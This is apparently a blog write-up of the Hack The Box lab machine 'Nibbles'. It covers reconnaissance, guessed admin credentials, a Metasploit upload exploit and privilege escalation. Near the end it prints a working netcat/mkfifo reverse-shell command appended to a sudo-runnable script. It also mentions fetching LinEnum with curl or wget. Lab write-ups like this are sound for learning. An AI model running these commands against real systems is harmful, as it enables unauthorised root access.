I have a soft spot for Nibbles as the was the very first CTF I had ever done (not just on HTB, on any platform of any kind). This was the box responsible for getting me bit with the pentesting bug and letting me start falling in love, developing my method, and doing a lot of professional growth. I completed this box within a week or two of finding the platform and sort of getting my feet under me. It was a nice, easy introduction and allowed me to get more familiar with the tools I’d come to use almost every time.
I had done a lot of reading on enumeration techniques and “where to start”, so my first step was an nmap scan. I copied what I saw in some videos (probably ippsec’s) and ran:
nmap -v -p 1-65535 -sV -O -sS -T4 10.10.10.75
This type of nmap scan prints verbose output, runs stealth syn scan, T4 timing (quicker), OS and version detection + full port range scan.
The results of this scan indicate only 2 open ports, and ALL other ports are closed. The open ports are:
22/tcp (ssh) – Open SSH 7.2p2 Ubuntu 4ubuntu2.2
80/tcp http – Apache httpd 2.4.18 Ubuntu
This information tells us this is undeniably a webserver of some kind.
Navigating to http://10.10.10.75 shows us a really bland “Hello World!” landing page.
I may be a newbie, but I’m 100% positive there’s more than meets the eye. Inspect element on the page, and we find a commented line stating:
<!–/nibbleblog/directory. Nothing interesting to see here–!>
There’s the next breadcrumb! I head over to http://10.10.10.75/nibbleblog, and now I have something I can interact with. This is a nibbleblog setup, which is an open-source blogging product. That means there’s directories we don’t see that we can probably access. Running dirb with it’s standard wordlist was enough to give me the following:
I worked alphabetically, and admin.php got me to a login page.
But… what do I login with? It took me several days of just “guessing”, and my best advice here is “think like a lazy user”. If you want a fancy tool to do this for you, CeWL is great for it, but I had not yet discovered it. CeWL will build a custom wordlist based on the website/directories itself and you can then use that to attempt to find passwords or usernames. All in all, it was far easier than I was thinking it to be, and the username/password was just lazy setup on the part of the administrator.
Once I logged in to the admin panel, there wasn’t really much there. I did explore some of the other directories, but didn’t find anything. I started googling exploits and nibbleblog does have one! Specifically, the My Images plugin can allow a user to execute PHP scripts. At this point, I was still using metasploit to learn the ropes and just get practice pwning machines, so I did so on this box. Based upon a review of the code at https://www.exploit-db.com/exploits/38489/, it looks like this relies upon the myimage plugin to be running (it fails if it’s not), and it injects a php script that can be uploaded into that directory. It requires a username and password, so I’m going to assumed the guessed credentials for admin.php will probably work here.
This is still an incredibly easy box to do without metasploit, and I’ll come back and update this at some point with the manual method.
Run the exploit. This will install an image.php file in the plugins directory, execute, delete the file, and bring you back to a meterpreter prompt. This gets us limited user access.
Now to find the user.txt flag. Change directory to the /home/ directory.
search -f user.txt. The flag is located in .\nibbler/user.txt
Read the file, paste the hash, now we move on the privilege escalation.
From meterpreter, enter shell. I started looking for what languages were installed, because that helps me determine what kind of shell I’m going to need.
ls -l /usr/bin/python* to see which, if any versions of python are installed.
Then, launch a full shell with: python3 -c ‘import pty; pty.spawn(“/bin/sh”)’
This was the box where I first learned about LinEnum. LinEnum is a fantastic script that runs all the “basic” privelege escalation checks you should be running on each and every Linux box you find. You won’t always find a vulnurability this way, but it’s definitely worth the few seconds it takes to run it, and sometimes it yields incredibly valuable information. I host LinEnum on a python webserver and generally have luck using curl or wget to install it locally. LinEnum cannot be run remotely. Also, make sure you’re always uploading to directories you have read/write access to.
Upload LinEnum, then make sure to chmod +x to make it executable. Run it, and see what output it provides you.
In this case, the LinEnum output of sudo -l tells us that nibbler can sudo without a password on the monitor.sh file. Let’s go see what monitor.sh is! It’s in a zip file on nibbler’s desktop. I can append or overwrite this file to throw me a reverse shell, no problem! I start netcat on my attack box (nc -lvp 1234), and then from the shell I currently have on the victim machine, I run:
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -I 2>&1|nc 10.10.14.18 1234 >/tmp/f’ >> monitor.sh
The reason I had to do this, versus the popular -e method for getting a shell from nc is because not all versions support the -e option, and this is the workaround.
With my listener running, I execute: sudo -u root ./monitor.sh then quickly cat root/root.txt. Done!